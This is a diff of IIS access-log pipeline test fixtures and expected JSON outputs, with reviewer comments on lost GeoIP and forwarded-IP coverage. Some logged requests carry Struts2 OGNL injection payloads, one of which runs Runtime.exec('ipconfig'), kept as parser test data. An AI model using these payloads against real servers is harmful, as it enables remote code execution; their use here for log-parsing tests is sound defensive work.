redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0 2018-12-31 12:52:33 10.44.0.136 GET /${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 0 \ No newline at end of file diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json index 584a0ebf980..66b85833c29 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json 
+++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json @@ -8,26 +8,8 @@ "ip": "127.0.0.1" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", - "ip": "85.181.35.98" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/", @@ -49,7 +31,7 @@ }, "related": { "ip": [ - "85.181.35.98", + "67.43.156.13", "127.0.0.1" ] }, @@ -63,8 +45,8 @@ }, "event": { "duration": 123000000, - "ingested": "2021-06-09T11:14:32.017302600Z", - "original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 85.181.35.98 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123", + "ingested": "2021-12-09T13:39:34.416760400Z", + "original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 67.43.156.13 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123", "kind": "event", "category": [ "web", @@ -139,7 +121,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-06-09T11:14:32.017316Z", + "ingested": "2021-12-09T13:39:34.416769800Z", "original": "2018-01-01 09:10:11 W3SVC1 GET / - 80 - 127.0.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - - example.com 200 0 0 123 456 789", "category": [ "web" 
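Review bot: In hunk `@@ -8,26 +8,8 @@` the replacement source address `67.43.156.13` comes with no `source.geo` or `source.as` at all, where `85.181.35.98` previously produced both, so this fixture stops verifying GeoIP and AS enrichment of an IPv4 client; the same happens in `@@ -170,26 +152,8 @@` on the next line. The IPv6 fixture in test-iis-access-75 gained `geo`/`as` data from an address in the supported subset, so presumably an IPv4 address from that subset that resolves in the bundled test database could be used here as well, which would keep the enrichment under test rather than silently dropping it from the expected document. If the absence is intentional, for example because `67.43.156.13` is deliberately outside the test database's ranges, a sentence saying so in the PR description would spare the next reader the same question.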
@@ -170,26 +152,8 @@ "ip": "127.0.0.1" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", - "ip": "85.181.35.98" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/", @@ -213,7 +177,7 @@ }, "related": { "ip": [ - "85.181.35.98", + "67.43.156.13", "127.0.0.1" ] }, @@ -234,8 +198,8 @@ }, "event": { "duration": 789000000, - "ingested": "2021-06-09T11:14:32.017361700Z", - "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 85.181.35.98 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", + "ingested": "2021-12-09T13:39:34.416775900Z", + "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 67.43.156.13 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", "kind": "event", "category": [ "web", @@ -305,7 +269,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:32.017367700Z", + "ingested": "2021-12-09T13:39:34.416781800Z", "original": "2018-12-31 12:52:33 10.44.0.136 GET / redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ 
@@ -374,7 +338,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:32.017372200Z", + "ingested": "2021-12-09T13:39:34.416787800Z", "original": "2018-12-31 12:52:33 10.44.0.136 GET /${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 0", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json index 337c173f877..d4514daef9c 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json @@ -55,7 +55,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-06-09T11:14:32.162635600Z", + "ingested": "2021-12-09T13:39:35.246884600Z", "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME ::1%0 GET / - 80 - ::1%0 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log index fbe5b8c3697..c2e3c332699 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log 
@@ -1,6 +1,6 @@ -2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200&height=630&mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 116.189.86.89 -2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 119.16.157.180 -2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35&height=38&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 119.160.162.213 -2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75&height=40&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 119.160.162.213 -2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60&height=20&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 
imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 156.189.143.218 -2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60&height=20&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 156.189.143.218 \ No newline at end of file +2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200&height=630&mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 67.43.156.14 +2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 67.43.156.14 +2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35&height=38&mode=crop 80 - 10.24.136.240 HTTP/1.1 
Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 67.43.156.14 +2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75&height=40&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 67.43.156.14 +2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60&height=20&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 67.43.156.14 +2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60&height=20&mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 
imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 67.43.156.14 \ No newline at end of file diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json index 97e129ba912..0dc93bc622f 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json @@ -22,7 +22,7 @@ "preserve_original_event" ], "network": { - "forwarded_ip": "116.189.86.89" + "forwarded_ip": "67.43.156.14" }, "iis": { "access": { 
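Review bot: Every `network.forwarded_ip` in this expected file now carries the same value, `67.43.156.14` (hunk `@@ -22,7 +22,7 @@` here, `@@ -108,7`, `@@ -189,7` and `@@ -277,7` on the following lines), where the old fixture had four distinct forwarded addresses across six log lines; a pipeline regression that attached the forwarded address of the wrong line, or reused a stale one, would no longer be caught by this test. The supported subset presumably offers more than one usable address, so mapping each original IP to its own replacement in test-x-forward-for-extended.log (whose hunk `@@ -1,6 +1,6 @@` also ends on this line) would restore that discrimination at no cost to the goal of the change.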
@@ -60,8 +60,8 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-06-09T11:14:32.189721300Z",
- "original": "2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200\u0026height=630\u0026mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 116.189.86.89",
+ "ingested": "2021-12-09T13:39:35.443415300Z",
+ "original": "2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200\u0026height=630\u0026mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 67.43.156.14",
 "kind": "event",
 "category": [
 "web",
@@ -108,7 +108,7 @@
 "preserve_original_event"
 ],
 "network": {
- "forwarded_ip": "119.16.157.180"
+ "forwarded_ip": "67.43.156.14"
 },
 "iis": {
 "access": {
@@ -145,8 +145,8 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-06-09T11:14:32.189737700Z",
- "original": "2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 119.16.157.180",
+ "ingested": "2021-12-09T13:39:35.443423700Z",
+ "original": "2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 67.43.156.14",
 "kind": "event",
 "category": [
 "web",
@@ -189,7 +189,7 @@
 "preserve_original_event"
 ],
 "network": {
- "forwarded_ip": "119.160.162.213"
+ "forwarded_ip": "67.43.156.14"
 },
 "iis": {
 "access": {
@@ -228,8 +228,8 @@
 },
 "event": {
 "duration": 15000000,
- "ingested": "2021-06-09T11:14:32.189744300Z",
- "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35\u0026height=38\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 119.160.162.213",
+ "ingested": "2021-12-09T13:39:35.443429200Z",
+ "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35\u0026height=38\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 67.43.156.14",
 "kind": "event",
 "category": [
 "web",
@@ -277,7 +277,7 @@
 "preserve_original_event"
 ],
 "network": {
- "forwarded_ip": "119.160.162.213"
+ "forwarded_ip": "67.43.156.14"
 },
 "iis": {
 "access": {
@@ -316,8 +316,8 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-06-09T11:14:32.189749100Z",
- "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75\u0026height=40\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 119.160.162.213",
+ "ingested": "2021-12-09T13:39:35.443434600Z",
+ "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75\u0026height=40\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 67.43.156.14",
 "kind": "event",
 "category": [
 "web",
@@ -365,7 +365,7 @@
 "preserve_original_event"
 ],
 "network": {
- "forwarded_ip": "156.189.143.218"
+ "forwarded_ip": "67.43.156.14"
 },
 "iis": {
 "access": {
@@ -404,8 +404,8 @@
 },
 "event": {
 "duration": 15000000,
- "ingested": "2021-06-09T11:14:32.189753100Z",
- "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 156.189.143.218",
+ "ingested": "2021-12-09T13:39:35.443440100Z",
+ "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 67.43.156.14",
 "kind": "event",
 "category": [
 "web",
@@ -453,7 +453,7 @@
 "preserve_original_event"
 ],
 "network": {
- "forwarded_ip": "156.189.143.218"
+ "forwarded_ip": "67.43.156.14"
 },
 "iis": {
 "access": {
@@ -492,8 +492,8 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-06-09T11:14:32.189756900Z",
- "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 156.189.143.218",
+ "ingested": "2021-12-09T13:39:35.443445300Z",
+ "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 67.43.156.14",
 "kind": "event",
 "category": [
 "web",
diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log
index 16bfc26a7e9..9821f6238e2 100644
--- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log
+++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log
@@ -1,9 +1,9 @@
-2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23
-2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23
-2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23
-2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27&$orderby=Subsys,Ref&$skip=0&$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23
-2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27&$orderby=RecNo&$skip=0&$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23
